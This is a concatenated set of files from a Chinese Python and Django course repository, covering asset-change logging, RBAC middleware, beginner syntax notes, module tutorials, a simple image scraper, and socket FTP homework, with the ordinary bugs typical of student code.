models.AssetRecord.objects.create(server=server, content=msg) # 添加 for nic_name in add_nic_slot_list: row_dict = nic_info[nic_name] row_record_list = [] for name, new_value in row_dict.items(): verbose_name = models.NIC._meta.get_field(name).verbose_name tpl = "%s:%s" % (verbose_name, new_value,) row_record_list.append(tpl) msg = "【网卡变更】新增网卡%s,网卡信息:%s" % (nic_name, ';'.join(row_record_list),) models.AssetRecord.objects.create(server=server, content=msg) row_dict['server'] = server row_dict['name'] = nic_name models.NIC.objects.create(**row_dict) def process_memory(request,server): # 1.1 获取数据库中的内存信息 memory_queryset = models.Memory.objects.filter(server=server) # 1.2 最新汇报来的内存信息 memory_info = request.data['memory']['data'] memory_queryset_set = {row.slot for row in memory_queryset} memory_info_set = set(memory_info) update_memory_slot_list = memory_info_set & memory_queryset_set add_memory_slot_list = memory_info_set - memory_queryset_set del_memory_slot_list = memory_queryset_set - memory_info_set # 更新 for mem_name in update_memory_slot_list: # models.Memory.objects.filter(slot=slot, server=server).update(**memory_info[slot]) obj = models.Memory.objects.filter(slot=mem_name, server=server).first() row_dict = memory_info[mem_name] record_list = [] for name, new_value in row_dict.items(): # old_value = str(getattr(obj, name)) old_value = (getattr(obj, name)) if old_value != new_value: setattr(obj, name, new_value) verbose_name = models.Memory._meta.get_field(name).verbose_name msg = "【内存变更】内存%s:%s由%s变更为%s" % (mem_name, verbose_name, old_value, new_value) record_list.append(msg) obj.save() if record_list: models.AssetRecord.objects.create(server=server, content=';'.join(record_list)) # 删除 models.Memory.objects.filter(server=server, slot__in=del_memory_slot_list).delete() if del_memory_slot_list: msg = "【内存变更】移除内存%s" % (';'.join(del_memory_slot_list)) models.AssetRecord.objects.create(server=server, content=msg) # 添加 for mem_name in add_memory_slot_list: row_dict = memory_info[mem_name] # 符合插槽名字的内存信息 row_record_list = [] for name, new_value in row_dict.items(): verbose_name = models.Memory._meta.get_field(name).verbose_name tpl = "%s:%s" % (verbose_name, new_value,) row_record_list.append(tpl) msg = "【网卡变更】新增网卡%s,网卡信息:%s" % (mem_name, ';'.join(row_record_list),) models.AssetRecord.objects.create(server=server, content=msg) row_dict['server'] = server models.Memory.objects.create(**row_dict)<file_sep>/day19/modelform/app01/forms.py from django import forms from django.core.validators import RegexValidator from django.core.exceptions import ValidationError from app01 import models class BookModelForm(forms.ModelForm): class Meta: model=models.Book fields="__all__" #model类里面所有的字段都展示 # fields="title" # 指定展示某些字段 # exclude=["title"] # 除了知道字段,其他字段都展示 # labels可以设置在网页上面显示的文字 labels={ "title":"书名", "publisher_date":"创建日期", "phone":"手机号", "publisher":"出版社", "authors":"作者", } widgets={ # 设置每个字段的插件信息 "title": forms.widgets.TextInput(attrs={"class": "form-control"}), "phone": forms.widgets.TextInput(attrs={"class": "form-control"}), "publisher": forms.widgets.Select(attrs={"class": "form-control"}), "authors": forms.widgets.SelectMultiple(attrs={"class": "form-control"}), } error_messages = { # 设置每个字段的报错提示信息 "publisher": { "required": "必须给我选一个出版社!" }, "authors":{ "required":"必须选择一个作者" } }<file_sep>/day24/auto - 12 - 权限粒度控制到按钮/相关脚本/2.获取可以做菜单的权限信息.py permission_menu_list = [ { 'permissions__title': '用户列表', 'permissions__url': '/app01/user/', 'permissions__name': 'user_list', 'permissions__menu_id': 1, 'permissions__menu__title': '用户管理', 'permissions__menu__icon': 'fa-clipboard', 'permissions__parent_id': None, 'permissions__parent__name': None }, { 'permissions__title': '添加用户', 'permissions__url': '/app01/user/add/', 'permissions__name': 'user_add', 'permissions__menu_id': None, 'permissions__menu__title': None, 'permissions__menu__icon': None, 'permissions__parent_id': 1, 'permissions__parent__name': 'user_list' }, { 'permissions__title': '编辑用户', 'permissions__url': '/app01/user/edit/(\\d+)', 'permissions__name': 'user_edit', 'permissions__menu_id': None, 'permissions__menu__title': None, 'permissions__menu__icon': None, 'permissions__parent_id': 1, 'permissions__parent__name': 'user_list' }, { 'permissions__title': '订单列表', 'permissions__url': '/app01/order/', 'permissions__name': 'order', 'permissions__menu_id': 2, 'permissions__menu__title': '商品管理', 'permissions__menu__icon': 'fa-clipboard', 'permissions__parent_id': None, 'permissions__parent__name': None } ] permission_list = [] for item in permission_menu_list: menu_id = item['permissions__menu_id'] if menu_id: permission_list.append(item) print(permission_list) """ [ {'permissions__title': '用户列表', 'permissions__url': '/app01/user/', 'permissions__name': 'user_list', 'permissions__menu_id': 1, 'permissions__menu__title': '用户管理', 'permissions__menu__icon': 'fa-clipboard', 'permissions__parent_id': None, 'permissions__parent__name': None}, {'permissions__title': '订单列表', 'permissions__url': '/app01/order/', 'permissions__name': 'order', 'permissions__menu_id': 2, 'permissions__menu__title': '商品管理', 'permissions__menu__icon': 'fa-clipboard', 'permissions__parent_id': None, 'permissions__parent__name': None} ] """<file_sep>/day1/01 变量注释用户交互等.py # 变量,将程序中运算的中间结果暂时存到内存中,以便后续程序调用。 BIRTH_OF_CHINA = 1949 x = 1+2+3+4 y = x*5 + 3 # print((1+2+3+4)*5 + 3) ''' 1,变量是由数字字母下划线任意组合。 2,变量不能是数字开头。 3,变量不能是Python中的关键字。 ['and', 'as', 'assert', 'break', 'class', 'continue', 'def', 'del', 'elif', 'else', 'except', 'exec', 'finally', 'for', 'from', 'global', 'if', 'import', 'in', 'is', 'lambda', 'not', 'or', 'pass', 'print', 'raise', 'return', 'try', 'while', 'with', 'yield'] 4,变量要具有可描述性。 name,age,fdasgfdas 5,变量不能使用中文。 6,变量不能过长。 AgeOfOldboy = 56 NumberOfStudents = 80 #下划线 age_of_oldboy = 56 number_of_students = 80 ''' # age1 = 6 # age2 = age1 # age3 = age2 # age2 = 13 # print(age1, age2, age3) # 6,13,6 #常量:一直不变的量。π,新中国成立 1949101 #约定俗成全部大写的变量为常量。放到文件最上面。 #注释:单行注释:# # 多行注释:''' ''' """ """ # 基础数据类型: ''' int:数字:计算。+ = * / % // ..... str:python中用引号引起来的就叫做字符串('' "")。 type(对象) 是什么数据类型 用处:储存简单的少量数据。 + * + 字符串的拼接。 * str* int bool: True,Flase ''' # print(666,type(666)) # print('666',type('666')) # msg = "My name is Alex , I'm 56 years old!" # msg = ''' # 今天我想写首小诗, # 歌颂我的同桌, # 你看他那乌黑的短发, # 好像一只炸毛鸡。 # ''' # print(msg) # a = '老男孩 ' # b = '是最好的培训机构' # c = a + b # print(c) # print('坚强'*8) # print(2 > 1) # input 出来的数据类型全部是字符串。 # name = input('请输入您的姓名:') # sex = input('请输入您的性别:') # print('我的名字是' + name,'我的性别是' + sex) msg =''' ------------ info of <NAME> ----------- Name : <NAME> Age : 56 job : Teacher Hobbie: laddy_boy ------------- end ----------------- ''' #格式化输出 % 占位符 s d #ps str -- > int str全部由数字组成 ‘1234’ #ps int -- > str str(int) #第一种表现形式: # name = input('请输入你的名字:') # age = input('请输入你的年龄:') # job = input('请输入你的工作:') # hobby = input('请输入你的爱好:') # msg1 = ''' ------------ info of %s ----------- # Name : %s # Age : %d # job : %s # Hobbie: %s # ------------- end ----------------- # ''' % (name,name,int(age),job,hobby) # print(msg1) #第二种方法: # dic = {'name':'老男孩','age':45,'job':'Teacher','hobby':'吹'} # msg1 = ''' ------------ info of %(name)s ----------- # Name : %(name)s # Age : %(age)d # job : %(job)s # Hobbie: %(hobby)s # ------------- end ----------------- # ''' % dic # print(msg1) # msg2 = '我叫%s,今年%s,学习进度5%%' % ('太白',23) # print(msg2) #if 语句。 ''' if 条件: 结果 ''' #1 # if 2 > 1 : # print(666) #2 # if 2 < 1: # print(666) # else: # print(555) #3 多种条件选一个结果 # num = int(input('猜一下数字:')) # if num == 6: # print('请你吃饭') # elif num == 3: # print('请你喝酒') # elif num == 1: # print('请你大保健') #4 多种条件必选一个结果 # num = int(input('猜一下数字:')) # if num == 6: # print('请你吃饭') # elif num == 3: # print('请你喝酒') # elif num == 1: # print('请你大保健') # else: # print('没机会了.....') # if 2 > 1: # if 2 < 1: # print(333) # else: # if '条件': # pass # print(666) # score = int(input("输入分数:")) # if score > 100: # print("我擦,最高分才100...") # elif score >= 90: # print("A") # elif score >= 60: # print("C") # elif score >= 80: # print("B") # elif score >= 40: # print("D") # else: # print("太笨了...E") #while 循环 ''' while 条件: 结果 ''' # while True: # print('凉凉') # print('斗地主') # print('社会摇') # print('DJ大悲咒') # 如何终止循环: #1,改变条件。 #2,break # count = 1 # while count <= 100: # print(count) # count = count + 1 # count = 1 # flag = True # while flag: # print(count) # count = count + 1 # if count == 101: # flag = False # count = 1 # sum = 0 # while count < 101: # sum = sum +count # count += 1 # print(sum) #while 关键字:break,continue #break 结束循环。 #continue 跳出本次循环,继续下一次循环。 # while True: # print(333) # print(5455) # print(222) # break # print(888) # print(666) # while True: # print(333) # print(222) # continue # print(888) # print(666) #while else:如果while循环,被break打断,则不走else # count = 1 # while count < 5: # print(count) # count += 1 # else: # print('循环正常完毕') #逻辑运算符 #() > not > and > or #前后都是比较运算 2 > 1 and 3 < 4 or 4 > 5 and 2 < 1 # print(2 > 1 and 3 < 4 or 4 > 5 and 2 < 1) # True # print(1 > 1 and 3 < 4 or 4 > 5 and 2 > 1 and 9 > 8 or 7 < 6) # False #前后都是数字 '''x or y if x is True,return x,else return y int ---> bool 非0为True,0为Flase ''' # print(3 or 2) # print(2 or 6) # print(0 or 6) # print(3 and 5) # print(1 > 2 or 3 and 4 > 5) #dict dic = {'name':'alex','age':12,'python21':['张三','李四']} # print(dic['name']) #list: [] # li = [1,2,3,'alex'] # print(li[3]) #for 循环 有限循环。 li = [1,2,3,'alex'] s = 'fdsagfdagasd' # for i in s: # print(i) # for i in s: # if i == 'a':pass # print(i) # else: # print(666) ''' 1、使用while循环输入 1 2 3 4 5 6 8 9 10 2、求1-100的所有数的和 3、输出 1-100 内的所有奇数 4、输出 1-100 内的所有偶数 5、求1-2+3-4+5 ... 99的所有数的和 奇数和偶数 ''' # 6、用户登陆(三次机会重试) #input username password #while i #可以支持多用户登录 li = [{'username':'alex','password':'SB'}, {'username':'wusir','password':'sb'}, {'username':'taibai','password':'男神'}, ] #客户输入了三次机会,都没成功,给它一个选择,让它在试试 # Y 再给他三次机会...不输入了,print('臭不要脸.....') # dic = {True:'alex',False:'SB'} # dic = {(1,2,3):'alex',(2,3):'SB'} # dic[(1,2,3)]<file_sep>/day2/购物车练习.py ##商品列表是个列表类型的 shangpin = [["iphone",6500], ["mac",10000], ["watch",200] ] shopping_list = [] salry = int(input("请时输入你的工资:")) print("商品列表;") while True: for i in enumerate(shangpin): print(i) buy_id = input("请时输入你的id:") if not buy_id: continue if buy_id.isdigit(): buy_id=int(buy_id) buy_num = input("请输入你的购买个数:") if not buy_num:continue if buy_num.isdigit(): buy_num = int(buy_num) if shangpin[buy_id][1] * buy_num < salry: print("你已经购买成功") a = 1 while a <= buy_num: shopping_list.append({"name": shangpin[buy_id][0],"price":shangpin[buy_id][1],"num":buy_num}) a += 1 #print(shopping_list) salry = salry - (shangpin[buy_id][1] * buy_num) print("你的余额是%s元" % (salry)) chinose = input("如果继续购买请按y,否则按q:") if chinose == "y" or chinose == "Y": continue else: salry = 0 for j in range(len(shopping_list)): print("订单%s: %s %s元" % (j + 1, shopping_list[j]["name"], shopping_list[j]["price"])) salry = salry + shopping_list[j]["price"] print("一共消费%s元" % (salry)) break else: print("你的余额已经不够了,请选择购买其他商品") <file_sep>/day16/mysite/app01/views.py # Create your views here. from django.shortcuts import HttpResponse, render, redirect from app01 import models # 定义一些处理用户请求的函数 def index(request): """ :param request: 所有跟用户请求相关的数据都封装到了一个名为request的对象中 :return: """ print(request.method) # 拿到用户请求的方法 print(request.path_info) # 拿到用户请求的路径 # 自己找文件打开然后读取内容 # with open('index.html', "rb") as f: # data = f.read() # return HttpResponse("o98k") # Django帮我打开html文件,然后把文件里面的内容读取出来给用户返回 return render(request, "index.html") # 登录页面 def login(request): # 根据用户发送请求的方法不同,做不同的操作 print(request.method) if request.method == "POST": # 表示用户给我提交用户名和密码数据了 # 从request中取用户 post 过来的数据 print(request.POST) # 是一个大字典 # 用户名密码正确性校验 username = request.POST.get("username", "") pwd = request.POST.get("password", "") if username == "alex" and pwd == "<PASSWORD>": # 登陆成功 # return HttpResponse("登陆成功") # 跳转到index页面,让用户的浏览器去访问新的页面(index页面) return redirect("/index/") else: # 登录失败 return HttpResponse("登录失败") # 给用户返回一个页面 用来做登录 return render(request, 'login.html') # 出版社列表 def publisher_list(request): # 把业务逻辑写在这里!!! # 1. 查询出所有的出版社数据 data = models.Publisher.objects.all() print(data) # 2. 在页面上中展示,将页面返回给用户 return render(request, "publisher_list.html", {"data": data}) # 添加出版社 def add_publisher(request): # 当请求方法是POST的时候,表示用户填写完出版社名字 给我发数据了 if request.method == "POST": # 1. 取到用户发送的数据 publisher_name = request.POST.get("publisher_name") # 2. 去数据库存储 models.Publisher.objects.create(name=publisher_name) # 3. 给用户返回响应, 让用户跳转到出版社列表页 return redirect("/publisher_list/") return render(request, "add_publisher.html") # 删除出版社 def delete_publisher(request): print(request.GET) # 1. 取到用户要删除的那一条数据 delete_id = request.GET.get("id") # 2. 去数据库删除掉 models.Publisher.objects.get(id=delete_id).delete() # 3. 删除成功之后,再跳转回出版社列表页面 return redirect("/publisher_list/") # 编辑出版社 def edit_publisher(request): # 当请求方式是POST时,表示用户已经修改完 给我发修改之后的数据了 if request.method == "POST": # 取用户提交过来的数据 edit_id = request.POST.get("id") new_publisher_name = request.POST.get("publisher_name") # 去修改数据库中指定出版社的name字段的值 # 先根据edit_id找到要编辑的出版社 obj = models.Publisher.objects.get(id=edit_id) # 修改出版社的name obj.name = new_publisher_name # 将改动同步到数据库 obj.save() # 编辑成功,跳转到出版社列表页面 return redirect("/publisher_list/") # 1. 获取用户要编辑的出版社的id edit_id = request.GET.get("id") # 2. 根据id去数据库找到这条记录 obj = models.Publisher.objects.get(id=edit_id) # 3. 在页面上展示原来的出版社名字 return render(request, "edit_publisher.html", {"publisher": obj}) <file_sep>/day24/auto - 12 - 权限粒度控制到按钮/rbac/middlewares/rbac.py import re from django.utils.deprecation import MiddlewareMixin from django.conf import settings from django.shortcuts import HttpResponse class RBACMiddleware(MiddlewareMixin): """ 用户权限校验的中间件 """ def process_request(self, request): """ 权限校验 1. 当前请求的URL 2. 去Session中获取当前用户拥有的所有的权限 3. 权限校验 :param request: :return: """ current_url = request.path_info # 1. 白名单处理 for valid in settings.VALID_LIST: if re.match(valid,current_url): return None # 2. 获取权限信息 permission_dict = request.session.get(settings.RBAC_PERMISSION_SESSION_KEY) if not permission_dict: return HttpResponse('当前用户无权限信息,请重新登录!') """ permission_dict = { 'user_list': {'url': '/app01/user/', 'menu_id': 1, 'parent_name': None}, 'user_add': {'url': '/app01/user/add/', 'menu_id': None, 'parent_name': 'user_list'}, 'user_edit': {'url': '/app01/user/edit/(\\d+)', 'menu_id': None, 'parent_name': 'user_list'}, 'order': {'url': '/app01/order/', 'menu_id': 2, 'parent_name': None} } """ # 3. 权限匹配 match = False for k,v in permission_dict.items(): reg = "^%s$" % v['url'] if re.match(reg,current_url): # 用于以后生成菜单时候,设置默认选中的菜单。 if v['menu_id']: request.default_selected_menu_name = k else: request.default_selected_menu_name = v['parent_name'] match = True break if not match: return HttpResponse('无权访问') <file_sep>/day9/线程/1 创建线程.py #线程默认都是加了gil锁,在同一时刻,只能有一个线程访问cpu import os import time from threading import Thread n=100 def func(i): global n time.sleep(1) n-=1 print(os.getpid(),'thread%s'%i) l=[] for i in range(100): p=Thread(target=func,args=(i,)) p.start() l.append(p) for t in l: t.join() print(n) # 什么是进程 :是计算机资源分配的最小单位 # 什么是线程 # 线程和进程的关系 : # 每一个进程中都至少有一个线程 # 每个进程里至少有一个主线程负责执行代码 # 在主线程中可以再开启一个新的线程 # 在同一个进程中就有两个线程同时在工作了 # 线程才是CPU调度的最小单位 # 多个线程之间的数据时共享的 #注意:使用多线程处理高计算的场景,python并不占优势,如果是高io类型的,就比较适合 #如:较多的网络请求,数据库请求,文件请求 <file_sep>/day20/CMS/static/js/register.js // 设置错误提示 $("#submit-btn").click(function () { // 因为注册功能有头像文件 数据,所以要用FormData对象提交数据 var fd = new FormData(); fd.append("username", $("#id_username").val()); fd.append("password", $("#id_password").val()); fd.append("re_password", $("#id_re_password").val()); fd.append("phone", $("#id_phone").val()); fd.append("email", $("#id_email").val()); fd.append("csrfmiddlewaretoken", $("[name='csrfmiddlewaretoken']").val()); // avatar头像 fd.append("avatar", $("#id_avatar")[0].files[0]); $.ajax({ url: "/register/", type: "post", data: fd, contentType: false, processData: false, success: function (res) { if (res.code === 1) { $.each(res.error, function (k, v) { console.log(k, v[0]); { // #先找到input标签,下面的那个标签,然后设置错误信息,再找到显示错误标签的父标签,设置has - error } $("#id_" + k).next().text(v[0]).parent().addClass("has-error"); }) } else { location.href = res.url } } }) }); // 给input标签绑定获取焦点就删除错误提示的动作 $(".register-form input").focus(function () { $(this).next().text("").parent().removeClass("has-error"); }); //头像预览功能 //值发生变化了 $("#id_avatar").change(function () { // 取到用户选中的头像文件 var fileObj = this.files[0]; //路径 // 新建一个FileReader对象,从本地磁盘加载文件数据 var fr = new FileReader(); fr.readAsDataURL(fileObj); // 读取文件是需要时间的 fr.onload = function () { // 找到头像预览的img标签,把它的src属性设置成我读取的用户选中的图片 $("#avatar-img").attr("src", fr.result) //结果 } });<file_sep>/day25/正则爬取.py # import requests # import re # import os # # url = 'https://www.qiushibaike.com/pic/page/%s/' # # # headers = { # 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36', # } # # # 指定起始也结束页码 # page_start = int(input('enter start page:')) # page_end = int(input('enter end page:')) # # # 创建文件夹 # if not os.path.exists('images'): # os.mkdir('images') # # 循环解析且下载指定页码中的图片数据 # for page in range(page_start, page_end + 1): # print('正在下载第%d页的图片' % page) # new_url = format(url % page) # print(new_url) # response = requests.get(url=new_url, headers=headers) # # # 解析图片链接正则匹配 # e = '<div class="thumb">.*?<img src="(.*?)".*?>.*?</div>' # pa = re.compile(e, re.S) # image_urls = pa.findall(response.text) # # #循环下载该页码下所有的图片数据 # # for url in image_urls: # image_url='https:'+ url # image_name=image_url.split('/')[-1] # image_path='images/'+image_name # image_data=requests.get(url=image_url,headers=headers).content # with open(image_path,'wb') as f: # f.write(image_data) #!/usr/bin/env python # -*- coding:utf-8 -*- import requests import re import os if __name__ == "__main__": url = 'https://www.qiushibaike.com/pic/%s/' headers={ 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36', } #指定起始也结束页码 page_start = int(input('enter start page:')) page_end = int(input('enter end page:')) #创建文件夹 if not os.path.exists('images'): os.mkdir('images') #循环解析且下载指定页码中的图片数据 for page in range(page_start,page_end+1): print('正在下载第%d页图片'%page) new_url = format(url % page) print(new_url) response = requests.get(url=new_url,headers=headers) #解析response中的图片链接 e = '<div class="thumb">.*?<img src="(.*?)".*?>.*?</div>' pa = re.compile(e,re.S) image_urls = pa.findall(response.text) #循环下载该页码下所有的图片数据 for image_url in image_urls: image_url = 'https:' + image_url image_name = image_url.split('/')[-1] image_path = 'images/'+image_name image_data = requests.get(url=image_url,headers=headers).content with open(image_path,'wb') as fp: fp.write(image_data)<file_sep>/day4/优秀的作业/优秀的作业/马珺浩/day04作业_马珺浩/员工信息数据库/readme.txt ‘员工信息数据库.py’为主程序; ‘员工信息.txt’为员工信息; ‘staff_pwd’为用户密码本; ‘员工信息数据库流程图_马珺浩.png’为程序流程图。 下面是程序玩法及说明: 1.程序开始运行,该程序模拟的环境是RHEL7的管理员状态,需手动终止程序; 2.想进入数据库有两种方式: (1)直接输入‘mysql’,进入数据库,此时用户登录状态为空,只支持查询功能; (2)已‘mysql -u [username] -p [password]’的形式登录数据库,[username]、 [password]信息取自密码表‘staff_pwd’,输入错误报错,输入正确进去数据库,并且支持 数据库的查询、修改、添加、删除功能。 3.数据库的查询方式有两种: (1)列名查询:使用列名查询的方式,语法格式为‘select [列名1 或 列名1,列 名2... 或 * ] where [条件(支持‘>’‘<’‘=’,例如:‘age>12’、‘job=IT’)]’, 语法输入正确后以表的形式打印查询结果;(例如输入‘select id,name,phone where age>12’) (2)模糊查询:使用模糊查询的方式,语法格式为‘select [列名1 或 列名1,列 名2... 或 * ] where [列名] like [条件]]’,语法输入正确后以表的形式打印查询结果; (例如输入‘select id,name,job where phone like 133’) 4.数据库的添加功能写了一个认证的装饰器,如果在进入数据库时,是直接输入‘mysql’进来 的话,那么输入‘insert ...’,由于当前的用户登录状态为空,所以回车后会请你输入用户 名、密码,用户名、密码信息来自‘staff_pwd’密码本; 5.修改、添加、删除功能暂不能实现; 6.语法校正:数据库语言要在命令结尾输入‘;’,在我的程序里,输不输入都可以,回车就够了; 7.退出数据库,输入‘exit’,退回到RHEL7的管理员状态,并清除数据库的用户登录状态; 8.主程序中的函数定义、循环等代码,以及在编写过程中方便记录变量名用来做什么,都已加注释 及描述。<file_sep>/day8/模块/模块.py #import my_module as mm money=2000 #mm.func() #print(mm.money) #总结 # 导入一个模块 就相当于执行了这个文件 # 一个模块如果执行多次import是什么效果?只执行一次 # from my_module import func as f ,money as m #as就是重命名 # f() # print(m) # 模块总结 # 能不能导入模块 : sys.path # 导入模块的顺序 : 内置 扩展 自定义 # 导入模块 : 相当于执行了这个模块,文件中的名字会被存储在一块独立的内存空间中 # import # 在全局创建了一个模块名,指向属于这个模块的命名空间 # 空间里存储了所有文件中的名字 # 起别名 import ... as .. # 不推荐一行导入多个模块 # from import # import后面的名字会出现在全局 ,相当于对独立命名空间中的一个引用 # from import 也支持 as语句 也支持 导入多个名字 # from import * 相当于导入所有名字,*和被导入模块__all__是互相影响的<file_sep>/day8/ftp作业/ceshi.py import socket import json import configparser class Server: def __init__(self,ip_port): self.ip_port=ip_port def init_socket(self): global conn global ret sk = socket.socket() sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sk.bind((self.ip_port)) sk.listen() while True: print('等待连接') conn, addr = sk.accept() print('连接成功') while True: ret=json.loads(conn.recv(1024).decode('utf-8')) if type(ret) ==list: ip_port.register_login() elif ret==ls: ip_port.cmd() elif ret==get: ip_port.get() conn.close() sk.close() def register_login(self): config = configparser.ConfigParser() config.read('userinfo') user = (config.sections()) username=ret[0] pwd=ret[1] for i in user: if i == username and config[username]['md5'] == pwd: conn.send('登录成功'.encode('utf-8')) else: conn.send('你输入的用户名或密码错误'.encode('utf-8')) def cmd(self): print('ls') def put(self): print('put') def get(self): print('get') server=Server(('127.0.0.1',8090)) server.init_socket() #ip_port.register_login() #if __name__=='__main__': <file_sep>/day8/glance/cmd/manage.py def main(): print('from manage.py')<file_sep>/day5/模块.py ##collections模块 import collections #orderedDict 有序字典 # d = collections.OrderedDict() # # d['苹果'] = 10 # d['手机']=5000 # print(d) # for i in d: # print(i,d[i]) ##defaultdict 默认字典 ##小于66的放到k2,大于66的放到k1,形成一个新字典 from collections import defaultdict #l= [11, 22, 33, 44, 55, 66, 77, 88, 99, 90] ##常规写法 # new_dict={} # for value in l: # if value>66: # if new_dict.has_key('k1'): # new_dict['k1'].append(value) # else: # new_dict['k1']=value # else: # if new_dict.has_key('k2'): # new_dict['k2'].append(value) # else: # new_dict['k2'] = value # print(new_dict) ##默认字典写法 # new_dict = defaultdict(list) # for value in l: # if value > 66: # new_dict['k1'].append(value) # else: # new_dict['k2'].append(value) # print(new_dict) ##namedtuple 生成可以使用名字来访问元素内容的tuple # from collections import namedtuple # Point = namedtuple('point',['x','y']) # p=Point(1,2) # print(p.x) # print(p.y) #deque双端队列 # from collections import deque # q=deque() # print(q) # q.append(1) # q.append(2) # print(q) # q.pop() # print(q) # q.appendleft('a') # q.appendleft('b') # print(q) # q.popleft() # print(q) ##time时间模块 import time # print(time.time()) ##时间戳时间 # print(time.strftime('%Y-%m-%d %H:%M:%S'))##字符串时间 # print(time.localtime()) ##结构化时间 ##时间转换 # print(time.localtime(1600000000)) ##时间戳转换成结构化时间 # struct_time=time.gmtime(1600000000) # print(time.strftime('%Y-%m-%d %H:%M:%S',struct_time))##结构化转换成字符串 ##字符串时间转换成时间戳时间 # s = '2015-12-3 8:30:20' # ret = time.strptime(s,'%Y-%m-%d %H:%M:%S') ##字符串转换成结构化 # print(ret) # print(time.mktime(ret)) ##结构化转换成时间戳 ''' ##计算两个时间段相隔了多长时间 #第一种写法 true_time=time.mktime(time.strptime('2008-05-12 08:30:00','%Y-%m-%d %H:%M:%S')) time_now=time.mktime(time.strptime('2018-05-07 11:00:00','%Y-%m-%d %H:%M:%S')) dif_time=time_now-true_time ##得到是一个时间戳 ret=time.gmtime(dif_time) ##把时间戳转换成结构化时间 print(ret) print('过去了%d年%d月%d天%d小时%d分钟%d秒' %(ret.tm_year-1970,ret.tm_mon-1,ret.tm_mday-1,ret.tm_hour,ret.tm_min,ret.tm_sec)) ''' ''' ##第二种写法 计算现在的时间跟1991年相差了多少时间 ago_time='1991-1-3' now_time=time.localtime() current_time=time.strptime(ago_time,'%Y-%m-%d') # print(now_time) # print(current_time) #cha_time=now_time-current_time print('过去了%d年%d月%d天' %(now_time.tm_year-current_time.tm_year,now_time.tm_mon-current_time.tm_mon,now_time.tm_mday-current_time.tm_mday)) ''' ##random 模块可以用于随机生成可用于验证码 import random # print(random.random()) ##是介于0和1之间的小数 # print(random.uniform(1,4)) ##介于1和4之间的的小数 # print(random.randint(1,5)) ##介于1和5之间的随机整数 ##随机生成一个四位的验证码 # s='' # for i in range(4): # s+=str(random.randint(0,9)) # print(s) ''' ##随机生成一个字母和数字组合的验证码 #(65,90)A-Z (97,122)a-z import random yanzheng='' for i in range(6): num1=random.randint(65,90) alpha1=chr(num1) num2=random.randint(97,122) alpha2=chr(num2) num3=str(random.randint(0,9)) #print(alpha1,alpha2,num3) s=random.choice([alpha1,alpha2,num3]) yanzheng+=s print(yanzheng) ''' #sys模块 python解释器 import sys #sys.exit() ##解释器退出,程序结束 # print(sys.path) #一个模块是否能够被导入 全看在不在sys.path列表所包含的路径下 # print(sys.modules) ## 放了所有在解释器运行的过程中导入的模块名 # print(sys.argv) ##注意,不能在pyhon里面直接执行,应该是D:\python21\day5\模块.py这种执行方式 ''' if sys.argv[1]=='hu' and sys.argv[2]=='123': print('登录成功') else: sys.exit() ''' ##os模块 import os # print(os.getcwdb())#获取当前目录 # os.chdir('C:\python21') #更改目录 # print(os.getcwdb()) # # ret = 'path1%spath2'%os.pathsep #输出用于分割文件路径的字符串 win下为;,Linux下为: # print(ret) print(os.name) #输出字符串指示当前使用平台。win->'nt'; Linux->'posix' #print(os.makedirs(r'c:/a/b')) ##创建多级目录 #os.removedirs(r'c:/a/b')# 若目录为空,则删除,并递归到上一级目录,如若也为空,则删除,依此类推 #print(os.listdir(r'c:\python21')) ##列出当前目录所有的文件和目录,以列表形式打印 # print(os.environ) ##获取系统环境变量 #os.system("dir") ##运行shell命令,直接显示,不用打印 # ret = os.popen("dir").read() ##运行shell命令,获取执行结果,需要打印 # print(ret) ##os.path # print(os.path.abspath(r'模块.py')) ##获取绝对路径 # #结果C:\python21\day5\模块.py # print(os.path.dirname('C:\python21\day5\模块.py')) ##获取上一级目录 # #结果C:\python21\day5 # print(os.path.split('C:\python21\day5\模块.py'))#将path分割成目录和文件名二元组返回 # #结果('C:\\python21\\day5', '模块.py') # print(os.path.basename('C:\python21\day5\模块.py')) ##只获取到文件名 #结果:模块.py # print(os.path.exists('C:\python21\day5\模块.py'))##判断路径是否存在,存在返回true # print(os.path.isabs(r'模块.py')) ##判断是否是绝对路径,是返回true # print(os.path.isfile('C:\python21\day5')) ##判断是否是文件,是返回true # print(os.path.isdir('C:\python21\day5')) ##判断是否是目录,是返回true # print(os.path.join('c:','python21'))##将多个路径组合后返回 # print(os.path.getatime('C:\python21\day5')) #获取文件目录最后访问时间 # print(os.path.getmtime('C:\python21\day5')) #获取文件目录最后修改时间 # print(os.path.getsize(r'C:\python21\day5\模块.py'))#获取文件大小 # print(os.path.getsize(r'C:\python21\day4'))#获取目录大小 ##获取目录下文件大小 ##计算不在同一目录下的文件大小 # dirs = "C:\python21\day4" # sum=0 # C:\python21\day4\ceshi.py # for path in ret: # if os.path.isfile(os.path.join(dirs, path)): # sum+=os.path.getsize(os.path.join(dirs,path)) # print(sum) ##同一目录下文件的大小 # ret = os.listdir(r'C:\python21\day5') # for path in ret: # if os.path.isfile(path): # sum+=os.path.getsize(path) # print(sum) ##计算文件夹下面的文件及其文件夹下的文件夹 ''' sum=0 def func(dirs): # 'C:\python21\day5') ##默认是字符串 global sum for file in os.listdir(dirs):##列出dirs目录下面所有的文件及其目录 if os.path.isdir(os.path.join(dirs,file)): ## # dirs 是 C:\python21\day5\a # file是 目录下面的文件 C:\python21\day5\a\b.txt func(os.path.join(dirs,file)) else: print("%s:%s" % (file,os.path.getsize(os.path.join(dirs,file)))) sum+=os.path.getsize(os.path.join(dirs,file)) return sum print(func(r'C:\python21\day5')) ''' # ###打印列表里面的每个元素,直到没有列表为止 # lst=[1,[2,[3,[4]]],"a"] # def func(lst): # for i in lst: # if type(i) == list: # func(i) # else: # print(i) # func(lst) sum = 0 def func(dirs): global sum for file in os.listdir(dirs): if os.path.isdir(os.path.join(dirs,file)): func(os.path.join(dirs,file)) else: sum+=os.path.getsize(os.path.join(dirs,file)) print("%s:%s" % (file,os.path.getsize(os.path.join(dirs,file)))) return sum print(func(r'C:\python21\day4')) <file_sep>/day8/ftp作业/get_client.py import socket import struct import json import os import hashlib DOWNLOAD_DIR=r'D:\python21\day8\ftp作业\download' class FtpClient: def __init__(self,host,port): self.host=host self.port=port self.client=socket.socket() 